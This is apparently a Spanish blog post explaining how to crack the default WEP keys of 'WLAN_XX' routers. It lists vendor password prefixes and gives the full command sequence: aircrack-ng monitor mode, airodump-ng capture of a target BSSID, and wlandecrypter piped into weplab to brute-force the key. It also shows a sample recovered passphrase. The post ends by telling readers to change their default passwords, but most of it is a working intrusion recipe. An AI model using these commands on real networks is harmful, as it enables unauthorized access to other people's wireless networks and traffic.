Según el modelo del router la password de la red inalámbrica será una u otra, las passwords siguen un patrón común si no se cambia la que viene configurada por defecto:
Password: RaízXXXXYY
Según el modelo tienen una "raíz de contraseña"
Z-com -> Z001349
Zyxel -> Z001349
P-660HW-D1 -> Z001349
Xavy -> X000138
Comtrend -> C0030DA
Zygate -> Z0002CF o C0030DA
Por la MAC del AP se puede saber el fabricante.
Las dos últimas cifras YY son los dos últimos carácteres del ESSID --> WLAN_YY
Como veis solo faltan cuatro caracteres mas y tendremos la password completa.
El ataque que vamos a realizar de esos caracteres será por fuerza bruta, para ello vamos a emplear una herramienta llamada wlandecrypter.
También nos será necesario el software weplab y la suite aircrack-ng
apt-get install weplab aircrack-ng
Ahora que ya lo tenemos todo instalado comenzamos el proceso:
airmon-ng start wlan0 --> Pone en modo monitor la subinterfaz mon0
airodump-ng mon0 --> Miramos a ver que se ve por mon0
airodump-ng --write "captura_wlan" --channel "CANAL" --bssid "BSSID" mon0 --> Capturamos el tráfico de la Wifi que nos interesa.
Cuando tengamos 4 o mas paquetes en el campo data podemos parar la captura presionando Ctrl+C
Ahora es el momento de usar wlandecrypter.
wlandecrypter "BSSID" "ESSID" | weplab --key 128 -y --bssid "BSSID" captura_wlan.cap
Esto debería de sacarnos la password en ASCII y en Hexadecimal:
Right KEY found!!
Passphrase was --> C0030DAA46F05
Key: 43:30:30:33:30:44:41:41:34:36:46:30:35
En este caso se puede ver que se trata de un Comtrend:C0030 y el ESSID es WLAN_05: 05 por fuerza bruta hemos sacado los caracteres DAA46.
NOTA: Cambiad la password por defecto!!!
No hay comentarios:
Publicar un comentario